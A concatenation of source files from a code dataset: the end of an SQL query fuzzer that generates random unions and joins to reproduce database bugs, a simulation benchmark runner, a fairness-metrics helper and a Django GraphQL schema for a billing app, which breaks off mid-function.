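            if c[1] == t:
                out.append(c)
                break
    out = list(dict.fromkeys(out))   # drop duplicates, keep order
    return out if len(out) == len(target_types) else None

print(reorder_by_type(["Integer", "String"],
                      [("a", "String"), ("b", "Integer")]))
# [('b', 'Integer'), ('a', 'String')]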
is False):\n # we only use select from base table to construct set queries\n continue\n print(\"find set compatible column\")\n # for j in range(len(select_columns_)):\n # c=select_columns_[j].label(\"subc\" + str(j))\n # select_columns_[j] = c\n # rearrange the column to match type\n reordered_select_columns_ = []\n for c_ in select_expr:\n for c in select_columns:\n if ret_typename_from_class(c.type) == ret_typename_from_class(\n c_.type):\n reordered_select_columns_.append(c)\n break\n reordered_select_columns_ = list(\n dict.fromkeys(reordered_select_columns_))\n\n if (len(reordered_select_columns_)) != len(select_columns):\n print(\"two query not set compatible\")\n continue\n stmt_ = select(reordered_select_columns_).where(where_clause)\n stmt_ = stmt_complex(stmt_, reordered_select_columns_)\n another_query = stmt_\n try:\n query_union = run_set_operation(temp_query,\n another_query).alias(name=\"dt\")\n selectable_columns = get_selectable_column(query_union)\n outside_where = spec.gen_where_clause(None, None, selectable_columns)\n print(\"set where\", outside_where)\n temp_query = select(random.sample(selectable_columns, random.randint(1, len(selectable_columns)))).select_from(query_union).where(outside_where)\n temp_query = stmt_complex(temp_query, selectable_columns)\n\n success_flag = True\n except Exception as inst:\n print(\"exception in using set operations\", inst)\n # print(\"q1:\", literalquery(temp_query))\n # print(\"q2:\", literalquery(another_query))\n if success_flag is True:\n return temp_query\ndef reproduce_bug2(spec, query_count):\n print(\"begin reproduce bug about rewritting union to union all\")\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n )\n stmt = select(select_columns).where(where_clause)\n # stmt = stmt_complex(stmt, selectable_columns)\n # # trigger set operation generation\n temp_query = stmt\n success_flag = False\n for i in range(3):\n # try to create a super query that involve 10 set operations\n select_columns_, where_clause_, table_idx_, selectable_columns_ = spec.gen_select_statement(\n select_column_number=len(select_columns))\n # for j in range(len(select_columns_)):\n # c=select_columns_[j].label(\"subc\" + str(j))\n # select_columns_[j] = c\n # rearrange the column to match type\n reordered_select_columns_ = []\n for c in select_columns:\n for c_ in select_columns_:\n if ret_typename_from_class(c.type) == ret_typename_from_class(\n c_.type):\n reordered_select_columns_.append(c_)\n break\n reordered_select_columns_ = list(\n dict.fromkeys(reordered_select_columns_))\n\n if (len(reordered_select_columns_)) != len(select_columns):\n break\n print(len(reordered_select_columns_), len(select_columns))\n stmt_ = select(reordered_select_columns_).where(where_clause_)\n stmt_ = stmt_complex(stmt_, reordered_select_columns_)\n another_query = stmt_\n try:\n random_suffix = random.randint(100,200)\n query_union = run_set_operation(temp_query,\n another_query).alias('d'+str(random_suffix))\n # investigate how to output a subset column of a nested selectable\n # all_column_names = self.spec_stat[table_idx].column_name\n # selectable_column = []\n # for item in all_column_names:\n # selected_col = getattr(self.scope.alc_tables[table_idx].c, item)\n # selectable_column.append(selected_col)\n # print(\"unioned query\", literalquery(query_union))\n # selected_col = getattr(query_union.c, \"subc0\")\n # print(\"selected col is\", selected_col)\n # temp_query = select([selected_col])\n temp_query = 
select([query_union])\n success_flag = True\n except Exception as inst:\n print(\"exception in using set operations\", inst)\n # print(\"q1:\", literalquery(temp_query))\n # print(\"q2:\", literalquery(another_query))\n if (success_flag is True):\n query_count += 1\n print(literalquery(temp_query) + \";\", file=sys.stderr)\n return query_count\n\n\ndef reproduce_bug4(spec):\n select_columns, where_clause, table_idx, selectable_columns, joined_from, base_table = spec.gen_select_statement(\n )\n if joined_from is not None:\n stmt = select(select_columns).select_from(joined_from).where(where_clause)\n else:\n stmt = select(select_columns).where(where_clause)\n stmt = stmt_complex(stmt, selectable_columns)\n num_sub = len(Scope.table_ref_stmt_list)\n if (num_sub < 5 and len(select_columns) == 1 and base_table):\n # only store subquery that has one column\n print(\"add subquery\", stmt)\n Scope.table_ref_stmt_list.append(stmt)\n stmt_sub = stmt.apply_labels().alias('d'+str(num_sub))\n num_sub += 1\n Scope.table_ref_list.append(stmt_sub)\n elif (len(select_columns) == 1 and base_table):\n # if the subquery list is full, reset the list\n print(\"reset\")\n Scope.table_ref_stmt_list = []\n Scope.table_ref_stmt_list.append(stmt)\n Scope.table_ref_list = []\n stmt_sub = stmt.apply_labels().alias('d'+str(0))\n Scope.table_ref_list.append(stmt_sub)\n if (random_int_range(1000) < conf.PROB_TABLE[\"set\"] and len(select_columns) < 4):\n # set operation\n print(\"try generate set query\")\n set_query = set_query_generation(spec, stmt, select_columns)\n if set_query is not None:\n print(\"set success\")\n return set_query\n else:\n print(\"set failed\")\n\n # generate three new statements\n # TODO: scalar subquery\n # pick an existing subq\n\n\n return stmt\n\ndef reproduce_bug3(spec, query_count):\n # this has merged into gen_select_statement code\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n )\n # if where_clause is not None:\n # # first_ = select_columns[0]\n # # print(type(first_))\n # # a = first_.alias(name=\"demo\")\n # # select_columns[0] = a\n # stmt = select(select_columns).where(\n # where_clause)\n choice = random_int_range_contain_zero(1)\n sqlalchemy_tables = spec.scope.alc_tables.copy()\n table_a = spec.scope.alc_tables[table_idx]\n selectable_columns = []\n for item in table_a._columns:\n selectable_columns.append(item)\n if (choice == 1):\n try:\n # for table in sqlalchemy_tables[1:]:\n if (len(table_a.foreign_keys)):\n print(\"try joined using foreign key relationship\")\n # print(\"number of referenced table is\", table_a.foreign_keys)\n random.shuffle(sqlalchemy_tables)\n for fkey in table_a.foreign_keys:\n for table_b in sqlalchemy_tables:\n if (((fkey).references(table_b))):\n referenced_table = fkey.target_fullname.split(\n \".\")[0]\n if (random_int_range(1000) <\n conf.PROB_TABLE[\"inner\"]):\n j = table_a.join(table_b)\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"outer\"]):\n j = table_a.outerjoin(table_b, full=True)\n # left outer join\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"left\"]):\n j = table_a.join(table_b, isouter=True)\n # right outer join\n else:\n j = table_b.join(table_a, isouter=True)\n for item in table_b._columns:\n # print(type(item))\n # selected_col = getattr(table_b, item)\n selectable_columns.append(item)\n random_columns = random.choices(\n selectable_columns,\n k=min(\n 4,\n randoms.random_int_range(\n len(selectable_columns))))\n stmt = select(random_columns).select_from(j)\n stmt = 
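# NOTE (hedged sketch): `reproduce_bug4` caches single-column subqueries on the
# Scope class, aliasing each as d0, d1, ... and resetting the cache once it
# holds five entries. The bookkeeping, condensed; the Scope fields are mirrored
# here as plain module-level lists, and `stmt` stands for any one-column select:
table_ref_stmt_list = []
table_ref_list = []

def remember_subquery(stmt):
    global table_ref_stmt_list, table_ref_list
    if len(table_ref_stmt_list) >= 5:        # cache full: reset, as the code does
        table_ref_stmt_list, table_ref_list = [], []
    name = "d%d" % len(table_ref_list)
    table_ref_stmt_list.append(stmt)
    table_ref_list.append(stmt.apply_labels().alias(name))  # SQLAlchemy 1.x style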
stmt_complex(stmt, selectable_columns)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n except Exception as inst:\n print(\"exception in join operations\", inst, sys.exc_info())\n # return query_count\n try:\n random_idx = random_int_range_contain_zero(len(select_columns) - 1)\n random_column = select_columns[random_idx]\n random.shuffle(sqlalchemy_tables)\n for table_b in sqlalchemy_tables:\n if table_b != table_a:\n for c in table_b.columns:\n # print(c.type)\n # if (c.type is (random_column.type)):\n if (isinstance(c.type, type(random_column.type))):\n if (random_int_range(1000) < conf.PROB_TABLE[\"true\"]):\n if (random_int_range(1000) <\n conf.PROB_TABLE[\"inner\"]):\n j = table_a.join(table_b, true())\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"outer\"]):\n j = table_a.outerjoin(table_b,\n true(),\n full=True)\n # left outer join\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"left\"]):\n j = table_a.join(table_b, true(), isouter=True)\n # right outer join\n else:\n j = table_b.join(table_a, true(), isouter=True)\n else:\n if (random_int_range(1000) <\n conf.PROB_TABLE[\"inner\"]):\n j = table_a.join(table_b, false())\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"outer\"]):\n j = table_a.outerjoin(table_b,\n false(),\n full=True)\n # left outer join\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"left\"]):\n j = table_a.join(table_b,\n false(),\n isouter=True)\n # right outer join\n else:\n j = table_b.join(table_a,\n false(),\n isouter=True)\n for item in table_b._columns:\n selectable_columns.append(item)\n random_columns = random.choices(\n selectable_columns,\n k=min(\n 4,\n randoms.random_int_range(\n len(selectable_columns))))\n stmt = select(random_columns).select_from(j)\n stmt = stmt_complex(stmt, selectable_columns)\n query_count += 1\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return query_count\n except Exception as inst:\n print(\"exception in join operations\", inst, sys.exc_info())\n return query_count\n\n\ndef main():\n signal.signal(signal.SIGINT,\n exit_gracefully(signal.getsignal(signal.SIGINT)))\n\n # DEFINE PARSER (strategy)\n main_parser = argparse.ArgumentParser()\n main_parser.add_argument(\"-s\",\n \"--strategy\",\n dest=\"strategy\",\n type=str,\n default=None,\n help=\"Mutation strategy\",\n required=True)\n main_parser.add_argument('--db_info',\n type=str,\n nargs='?',\n default=\".\",\n help='database name',\n required=True)\n main_parser.add_argument('--output',\n type=str,\n nargs='?',\n default='demo.sql',\n help=\"generate queries file\")\n main_parser.add_argument('--queries',\n type=int,\n nargs='?',\n default=1,\n help='number of queries generated',\n required=True)\n main_parser.add_argument('--dialect ')\n main_parser.add_argument(\n '--prob_table',\n type=str,\n nargs='?',\n default='.',\n help='prob table for controlling the query generation',\n required=True)\n\n main_parser.set_defaults(action='mutation')\n args = main_parser.parse_args()\n\n load_pbtable(args.prob_table)\n \n if args.db_info != \".\":\n config_data = {}\n try:\n with open(args.db_info) as f:\n config_data = json.load(f)\n tables, tables_stat, sqlalchemy_tables, alc_tables = load_existing_dbschema(\n config_data)\n cs = CreateSequences(max_table=config_data[\"max_table\"],\n max_column=config_data[\"max_column\"],\n db_name=config_data[\"name\"],\n max_tuple=15000000)\n cs.update_from_existing_db(tables, tables_stat,\n sqlalchemy_tables, alc_tables)\n query_count = 0\n while (query_count < 
args.queries):\n # ************ Begin doing SQLSMITH STUFF ***********\n # ************ reproduce bug1 ***********\n scope = Scope()\n scope.add_alc(sqlalchemy_tables)\n # global spec\n spec = Query_Spec(\"demo\", tables, tables_stat, scope)\n stmt = reproduce_bug4(spec)\n print(\"GENENOFIJOWIEJFW\")\n print(stmt)\n print(\"flag\")\n try:\n stmt_string = literalquery(stmt)\n print(stmt_string.replace(\"ON 1\", \"ON TRUE\") + \";\", file=sys.stderr)\n query_count += 1\n print(\"success print literalquery\")\n except:\n traceback.print_stack()\n traceback.print_exception()\n print(\"error in printing out query\")\n\n print(\"Total number of queries generated is\", query_count)\n\n except Exception as inst:\n print('print_exc():')\n traceback.print_exc(file=sys.stdout)\n print(type(inst), inst.args, inst)\n exit(1)\n \n \n if args.strategy == 'sequence':\n\n drop_db = \"drop database sqlalchemy\"\n create_db = \"create database sqlalchemy\"\n\n run_query_pg(drop_db)\n run_query_pg(create_db)\n run_query_my(drop_db)\n run_query_my(create_db)\n\n cs = CreateSequences(max_table=randoms.random_int_range(5) + 1,\n max_column=5,\n max_tuple=10)\n cs.create_tables()\n print(\"finish creating database schema\")\n cs.insert_tuples()\n # cs.select_tuples()\n # cs.update_tuples_sqlalchemy()\n # cs.delete_tuples()\n # cs.gen_sqlsmith_queries()\n\n # cs.mutation(\"index\")\n # print(\"Finish creating index\")\n # cs.mutation(\"select\")\n # cs.mutation(\"where\")\n else:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n # for c in table_b.columns:\n # # print(c.type)\n # # if (c.type is (random_column.type)):\n # # j = table_a.join(table_b)\n # # subquery 1\n # j = table_a.outerjoin(table_b, true(), full=False)\n # stmt = select(selectable_columns_a +\n # selectable_columns_b).select_from(j).alias('d1')\n # # subquery 2\n # j_ = table_a.outerjoin(table_b, true(), full=True)\n # stmt_ = select(selectable_columns_a +\n # selectable_columns_b).select_from(j).alias('d2')\n\n # j_ = stmt.outerjoin(stmt_, true())\n # random_columns_from_stmt = random.sample(\n # get_selectable_column(stmt) + get_selectable_column(stmt_),\n # random_int_range(len(get_selectable_column(stmt))))\n\n # stmt_ = select(random_columns_from_stmt).select_from(j_).limit(\n # 10)\n # # print(literalquery(stmt_))\n\n\n\n# def choose_columns_sqlalchemy(table, column_names, option):\n# # table: sqlalchemy object\n# # column_names: string\n\n# if option == \"one\":\n# num_cols = 1\n# chosen_columns = random.choices(\n# column_names, k=randoms.random_int_range(num_cols))\n\n# elif option == \"all\":\n# chosen_columns = column_names\n\n# elif option == \"wo_idx\":\n# # TODO: fix here (like with_idx)\n# defined_indexes = set(map(lambda x: x.name, list(table.indexes)))\n# chosen_columns = list(set(column_names) - defined_indexes)\n\n# elif option == \"with_idx\":\n# # print(str(list(list(table.indexes)[0].columns)[0]).split(\".\")[1])\n# chosen_columns = list(\n# map(lambda x: str(list(x.columns)[0]).\n# split(\".\")[1], list(table.indexes)))\n\n# else:\n# num_cols = len(column_names)\n# chosen_columns = random.choices(\n# column_names, k=randoms.random_int_range(num_cols))\n\n# out = []\n# for item in chosen_columns:\n# # print(table.c)\n# # print(item)\n# selected_col = getattr(table.c, item)\n# out.append(selected_col)\n\n# return 
out\n","repo_name":"luke9kim8/QueryGen","sub_path":"sqlfuzz/mutator.py","file_name":"mutator.py","file_ext":"py","file_size_in_byte":78856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18681114528","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport csv\nimport numpy as np\n\nratios = np.append(np.logspace(-1.5,1.5,12), [1])\nDs = [0.06, 4.0]\ndata = []\n\nfor D in Ds:\n for ratio in ratios: \n print(\"running pSpatiocyte MAPK model with diffusion coefficient, D:\", D,\n \"ratio:\", ratio)\n ratio_str = '{:.4f}'.format(ratio)\n dirname = 'D_'+str(D)+'__ratio_'+ratio_str\n result = subprocess.run(['mpirun', '-np', '8', 'mapk', dirname, str(D),\n str(ratio)], stdout=subprocess.PIPE)\n time = float(result.stdout.decode('utf-8').split('\\n')[-2])\n data.append([D, ratio, time])\n print('\\telapsed time:',time)\n\nwith open(\"elapsed_time.txt\", \"w+\") as f:\n writer = csv.writer(f)\n writer.writerow(['D', 'ratio', 'elapsed_time'])\n for row in data:\n writer.writerow(row)\n\n\n","repo_name":"satya-arjunan/pspatiocyte","sub_path":"src/pspatiocyte/models/mapk/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29589169359","text":"from sklearn.metrics import accuracy_score, precision_score, confusion_matrix\nfrom sklearn.metrics import recall_score, f1_score\nfrom fairlearn.metrics import MetricFrame\nfrom fairlearn.metrics import count, selection_rate, mean_prediction\nfrom fairlearn.metrics import false_negative_rate, false_positive_rate\nfrom fairlearn.metrics import true_negative_rate, true_positive_rate\n\ndef eval_clf_fairness(y_true, y_pred, z_true, binary=True):\n metrics = {\n \"accuracy\": accuracy_score,\n \"confusion matrix\": confusion_matrix,\n \"count\": count\n }\n if binary:\n metrics.update({\n \"recall\": recall_score,\n \"precision\": precision_score,\n \"f1 score\": f1_score,\n \"mean prediction\": mean_prediction,\n \"selection rate\": selection_rate,\n \"false negative rate\": false_negative_rate,\n \"false positive rate\": false_positive_rate,\n \"true negative rate\": true_negative_rate,\n \"true positive rate\": true_positive_rate\n })\n metric_frame = MetricFrame(metrics=metrics,\n y_true=y_true,\n y_pred=y_pred,\n sensitive_features=z_true)\n return metric_frame","repo_name":"zeyuyang8/wellearn","sub_path":"src/metrics/fairness.py","file_name":"fairness.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9335185659","text":"import graphene\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphene_django.types import DjangoObjectType\nfrom app.models import *\nfrom graphene import relay\nfrom django.contrib.auth.models import User\nfrom graphene.relay.node import from_global_id\nimport datetime\nfrom django.contrib.auth import get_user_model\nfrom django.core.files import File\nfrom django.template.loader import get_template \nfrom django.template import Context\nimport pdfkit\nimport os\nfrom fpdf import FPDF\nimport django_filters\nfrom django_filters import FilterSet\nfrom graphene_file_upload.scalars import Upload\nfrom django.db.models import Q\n\nclass Dashboard(graphene.ObjectType):\n sales = graphene.Int()\n purchase = graphene.Int()\n\n def resolve_sales(parent,info):\n print(parent)\n\n return parent['sales']\n \n def 
resolve_purchase(parent,info):\n return parent['purchase']\n\nclass InvoiceNumber(graphene.ObjectType):\n last_number = graphene.Int()\n exist = graphene.Boolean()\n def resolve_last_number(parent,info):\n return parent[\"last_number\"]\n def resolve_exist(parent,info):\n return parent[\"exist\"]\n\n# class LedgerCustom(graphene.ObjectType):\n\n\nclass BankNode(DjangoObjectType):\n class Meta:\n model = Bank\n filter_fields=()\n interfaces = (relay.Node,)\n\nclass LedgerNode(DjangoObjectType):\n class Meta:\n model = Ledgers\n filter_fields=()\n interfaces = (relay.Node,)\n\n\nclass UserNode(DjangoObjectType):\n class Meta:\n model = User\n filter_fields=()\n interfaces = (graphene.Node,)\n # interfaces = (relay.Node,)\n# class PurchaseProductFilter(FilterSet):\n# purchase_id = django_filters.NumberFilter(field_name=\"purchase__id\",lookup_expr=\"exact\")\n# class Meta:\n# model = PurchaseProduct\n# fields = [\"purchase__id\"]\n\n\nclass PurchaseProductNode(DjangoObjectType):\n class Meta:\n model = PurchaseProduct\n filter_fields=()\n # filterset_class = PurchaseProductFilter\n interfaces = (relay.Node,)\n\n\nclass PurchaseFilter(FilterSet):\n vendor__iexact = django_filters.CharFilter(field_name=\"vendor__name\",lookup_expr=\"iexact\")\n date_gte = django_filters.DateFilter(field_name=\"date\",lookup_expr=\"gte\")\n date_lte = django_filters.DateFilter(field_name=\"date\",lookup_expr=\"lte\")\n class Meta:\n model = Purchase\n fields = [\"vendor__name\",\"date_gte\",\"date_lte\"]\n \n filter_fields={\n # \"vendor__name\":[\"iexact\"],\n \"date\":[\"lte\",\"gte\"],\n }\n @property\n def qs(self):\n return super(PurchaseFilter,self).qs.filter(user_id = self.request.user.id) \n\nclass PurchaseNode(DjangoObjectType):\n class Meta:\n model = Purchase\n # filter_fields=()\n \n\n filterset_class = PurchaseFilter\n interfaces = (relay.Node,)\n products = graphene.Int()\n originalId = graphene.Int()\n def resolve_products(self,info):\n return len(PurchaseProduct.objects.filter(purchase_id = self.id))\n def resolve_originalId(self,info):\n return self.id\n\nclass ProductFilter(FilterSet):\n name_startswith = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n class Meta:\n model = Product\n fields = [\"name\",]\n @property\n def qs(self):\n return super(ProductFilter,self).qs.filter(user_id = self.request.user.id)\n\n\nclass ProductNode(DjangoObjectType):\n class Meta:\n model = Product\n filterset_class = ProductFilter\n # filter_fields=()\n interfaces = (relay.Node,)\n \nclass CategoryNode(DjangoObjectType):\n subCategory = graphene.Int()\n product = graphene.Int()\n class Meta:\n model = Category\n filter_fields = ()\n interfaces = (relay.Node,)\n def resolve_subCategory(self,info):\n return len(SubCategory.objects.filter(category_id=self.id))\n def resolve_product(self,info):\n return len(Product.objects.filter(subcategory_id__in=[i.id for i in SubCategory.objects.filter(category_id=self.id)]))\n\nclass SubCategoryNode(DjangoObjectType):\n product = graphene.Int()\n class Meta:\n model = SubCategory\n filter_fields = ()\n interfaces = (relay.Node,)\n def resolve_product(self,info):\n return len(Product.objects.filter(subcategory_id=self.id))\n\nclass ProfileNode(DjangoObjectType):\n class Meta:\n model = Profile\n filter_fields=()\n interfaces = (relay.Node,)\n\nclass BillingFilter(FilterSet):\n # customer__name = django_filters.CharFilter(lookup_expr=[\"iexact\"])\n customer__iexact = django_filters.CharFilter(field_name=\"customer__name\",lookup_expr=\"in\")\n\n # 
INV#8-6\n class Meta:\n model = Billing\n fields = [\"customer__name\",\"invoice_number\"]\n @property\n def qs(self):\n return super(BillingFilter,self).qs.filter(user_id = self.request.user.id).order_by(\"-id\")\n\nclass PartialPaymentNode(DjangoObjectType):\n class Meta:\n model = ParitalPayment\n filter_fields =()\n interfaces = (relay.Node,)\n\nclass BillingNode(DjangoObjectType):\n class Meta:\n model = Billing\n # filter_fields = [\"customer__name\",]\n filterset_class = BillingFilter\n # filter_fields={\n # \"customer__name\":[\"exact\",\"iexact\"], \n # }\n\n interfaces = (relay.Node,)\n\nclass CSaleFilter(FilterSet):\n # name_startswith = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n isAdded = django_filters.BooleanFilter(field_name=\"customer__outstanding_add\",lookup_expr=\"exact\")\n\n class Meta:\n model = CSales\n fields = [\"isAdded\",]\n # filter_fields={\n # # \"vendor__name\":[\"iexact\"],\n # \"sales\":[\"lte\",\"gte\"],\n \n @property\n def qs(self):\n return super(CSaleFilter,self).qs.filter(user_id = self.request.user.id)\n\n\nclass CSalesNode(DjangoObjectType):\n class Meta:\n model = CSales\n # filter_fields = ()\n filterset_class = CSaleFilter\n # filter_fields={\n # # \"vendor__name\":[\"iexact\"],\n # \"sales\":[\"lte\",\"gt\"],\n # }\n interfaces = (relay.Node,)\n\n\nclass VPurchaseNode(DjangoObjectType):\n class Meta:\n model = VPurchase\n filter_fields={\n \"vendor__name\":[\"exact\"]\n }\n interfaces = (relay.Node,)\n\n\nclass CustomerFilter(FilterSet):\n name = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n company_Icontains = django_filters.CharFilter(field_name=\"company\", lookup_expr=\"icontains\")\n # sales = django_filters.NumberFilter(field_name=\"\")\n # name_startswith = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n class Meta:\n model = Customer\n fields = [\"name\",\"company\",\"outstanding_add\",\"company_Icontains\"]\n @property\n def qs(self):\n return super(CustomerFilter,self).qs.filter(user_id = self.request.user.id)\n\nclass CustomerNode(DjangoObjectType):\n sales = graphene.Float()\n paid = graphene.Float()\n outstanding = graphene.Float()\n\n\n\n # purchase = graphene.Int()\n class Meta:\n model = Customer\n # filter_fields={\n # \"name\":[\"exact\",\"iexact\"]\n # }\n filterset_class = CustomerFilter\n\n\n interfaces = (relay.Node,)\n def resolve_sales(self,info):\n return sum([i.net_amount for i in Customer.objects.get(id=self.id).billing_set.all()])\n \n def resolve_paid(self,info):\n return sum([i.paid for i in Customer.objects.get(id=self.id).paritalpayment_set.all()])\n def resolve_outstanding(self,info):\n return sum([i.outstanding for i in Customer.objects.get(id=self.id).paritalpayment_set.all()])\n\n \nclass Sales_ProductNode(DjangoObjectType):\n class Meta:\n model = Sales_Product\n filter_fields=()\n interfaces = (relay.Node,) \n\nclass VendorFilter(FilterSet):\n name_contains = django_filters.CharFilter(field_name=\"name\",lookup_expr=\"icontains\")\n company_Icontains = django_filters.CharFilter(field_name=\"company\", lookup_expr=\"icontains\")\n class Meta:\n model = Vendor\n fields = [\"name\",\"company\",\"outstanding_add\",\"company_Icontains\"]\n @property\n def qs(self):\n return super(VendorFilter,self).qs.filter(user_id = self.request.user.id)\n\n\nclass VendorNode(DjangoObjectType):\n purchase = graphene.Float()\n paid = graphene.Float()\n outstanding = graphene.Float()\n\n class Meta:\n model = Vendor\n # filter_fields = ()\n 
filterset_class = VendorFilter\n interfaces = (relay.Node,)\n\n def resolve_purchase(self,info):\n return sum([i.total_bill for i in Vendor.objects.get(id=self.id).purchase_set.all()])\n \n def resolve_paid(self,info):\n return sum([i.paid for i in Vendor.objects.get(id=self.id).paritalpayment_set.all()])\n def resolve_outstanding(self,info):\n return sum([i.outstanding for i in Vendor.objects.get(id=self.id).paritalpayment_set.all()])\n\nclass StateNode(DjangoObjectType):\n class Meta:\n model = State\n filter_fields = ()\n interfaces = (relay.Node,)\nclass CityNode(DjangoObjectType):\n class Meta:\n model = City\n filter_fields = ()\n interfaces = (relay.Node,)\n\n\nclass CreateProduct(graphene.Mutation):\n class Arguments:\n is_new = graphene.Boolean(required=True)\n pid = graphene.String(required=True)\n\n name = graphene.String(required=True)\n taga = graphene.Float(required=True)\n grossm = graphene.Float(required=True)\n less = graphene.Float(required=True)\n netm = graphene.Float(required=True)\n # qty = graphene.Int(required=True)\n # typeofpacking = graphene.String(required=True)\n\n\n # mrp = graphene.Float(required=True)\n cost_price = graphene.Float(required=True)\n list_price = graphene.Float(required=True)\n # purchase_from = graphene.String(required=True)\n \n # gst = graphene.String(required=True)\n # mfg = graphene.String(required=True)\n exp = graphene.String(required=True)\n # exp_time = graphene.Int(required=True)\n\n # discount = graphene.Float(required=True)\n hsn = graphene.String(required=True)\n # batch = graphene.String(required=True)\n\n # category_id = graphene.ID(required=True)\n # sub_category_id = graphene.ID(required=True)\n\n product = graphene.Field(ProductNode)\n isNew = graphene.Boolean()\n def mutate(self,info,pid,is_new,name,taga,grossm,less,netm, cost_price,list_price,exp,hsn):\n # p = Product.objects.filter(name=name)\n if(is_new is False):\n p = Product.objects.get(id=from_global_id(pid)[1])\n p.name = name\n p.taga = taga\n # p.type_of_packing = typeofpacking\n\n # p.mrp = mrp\n p.price = list_price\n p.cost = cost_price\n\n # p.mfg = mfg\n p.expiry_date = datetime.datetime.strptime(exp,\"%Y-%m-%d\") \n # p.expiry_time = exp_time\n\n # p.discount = discount\n p.hsn = hsn\n p.grossm = grossm\n p.netm = netm\n p.less = less\n # p.batch = batch\n # p.subcategory_id = from_global_id(sub_category_id)[1]\n p.save()\n\n return CreateProduct(product = p,isNew = False)\n \n\n else:\n product = Product.objects.create(\n name = name,\n taga = taga,\n # qty = qty,\n # type_of_packing = typeofpacking,\n\n # mrp = mrp,\n price = list_price,\n cost = cost_price,\n\n # mfg = mfg,\n expiry_date = datetime.datetime.strptime(exp,\"%Y-%m-%d\") ,\n # expiry_time = exp_time,\n\n # discount = discount,\n hsn = hsn,\n # batch = batch,\n grossm = grossm,\n netm = netm,\n less = less,\n user_id=info.context.user.id,\n # subcategory_id = from_global_id(sub_category_id)[1]\n )\n return CreateProduct(product = product,isNew = True)\n \n\nclass MInput(graphene.InputObjectType):\n product_id = graphene.String(required=True)\n name = graphene.String(required=True)\n # qty = graphene.Int()\n grossm = graphene.Float()\n less = graphene.Float()\n net = graphene.Float()\n price = graphene.Float()\n taga = graphene.String()\n # gst = graphene.Float()\n # discount = graphene.Float()\n # expiry = graphene.String()\n\n\nclass PurchaseInput(graphene.InputObjectType):\n product_id = graphene.String(required=True)\n name = graphene.String(required=True)\n # qty = graphene.Int()\n # taga = 
graphene.Int()\n # mrp = graphene.Float()\n grossm = graphene.Float()\n less = graphene.Float()\n netm = graphene.Float()\n price = graphene.Float()\n cost = graphene.Float()\n discount = graphene.Float()\n\n\nclass AddPurchase(graphene.Mutation):\n class Arguments:\n vendor_id = graphene.ID(required=True)\n invoice_date = graphene.String(required=True)\n invoice_number = graphene.String(required=True)\n products = graphene.List(PurchaseInput)\n invoice = Upload(required=True)\n purchase = graphene.Field(PurchaseNode)\n def mutate(self,info,vendor_id,invoice_date,invoice_number,products,invoice,**kwargs):\n purchase = Purchase.objects.create(vendor_id = from_global_id(vendor_id)[1],invoice_date = datetime.datetime.strptime(invoice_date,\"%Y-%m-%d\"),invoice_number = invoice_number,user_id=info.context.user.id)\n \n # print(info.context.FILES)\n # print(invoice)\n # print(kwargs)\n\n # purchase = Purchase.objects.get(id=7)\n for i in products:\n PurchaseProduct.objects.create(\n product_id = from_global_id(i.product_id)[1],\n # qty = i.qty,\n # mrp = i.mrp,\n grossm = i.grossm,\n less = i.less,\n netm = i.netm,\n list_price = i.price,\n cost = i.cost,\n discount = i.discount,\n purchase_id = purchase.id\n )\n Ledgers.objects.create(purchase_id = purchase.id,user_id = info.context.user.id)\n # purchase = Purchase.objects.get(id=7)\n return AddPurchase(purchase = purchase)\n\n\n\ndef generate_receipt(bill,products,user): \n pdf = FPDF(orientation='P', unit='pt', format='A4') \n pdf.add_page() \n pdf.set_font(\"Arial\", \"B\", 17) \n pdf.cell(0, 30, \"{}\".format(user.profile.firm_name), 0, 0, \"L\") \n pdf.cell(0,30,\"Invoice\",0,1,\"R\") \n pdf.set_font(\"Arial\", \"\", 12) \n pdf.cell(0,20,\"{}\".format(user.profile.address),0,0,\"L\") \n pdf.cell(0,20,\"Invoice Number : {}\".format(bill.invoice_number),0,1,\"R\") \n pdf.cell(0,20,\"{}\".format(user.profile.contact_number),0,0,\"L\") \n pdf.cell(0,20,\"Date: {}\".format(bill.billing_date.strftime(\"%b %d, %Y\")),0,1,\"R\") \n pdf.cell(0,23,\"{}\".format(user.profile.GST_no),0,1,\"L\") \n pdf.cell(0,23,\"Bill to\",0,1,\"L\") \n pdf.set_font(\"Arial\",\"B\",13) \n pdf.cell(0,20,\"{}\".format(bill.customer.name),0,1,\"L\") \n pdf.set_font(\"Arial\",\"\",12) \n pdf.cell(0,20,\"{}\".format(bill.customer.mobile),0,1,\"L\") \n epw = pdf.w - 2*pdf.l_margin \n # col_width = epw/4 \n th = pdf.font_size \n pdf.ln(th*4) \n \n # for row in data: \n # for datum in row: \n # pdf.cell(col_width, 2*th, str(datum), border=1) \n # pdf.ln(2*th) \n # pdf.ln(2*th) \n pdf.set_font(\"Arial\", \"B\", 8)\n pdf.cell(20, 2*th, \"Sn.\",1,0,\"C\")\n pdf.cell(100, 2*th, \"Name\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Pack\",1,0,\"C\")\n pdf.cell(45, 2*th, \"HSN\",1,0,\"C\")\n pdf.cell(30, 2*th, \"Exp\",1,0,\"C\")\n pdf.cell(40, 2*th, 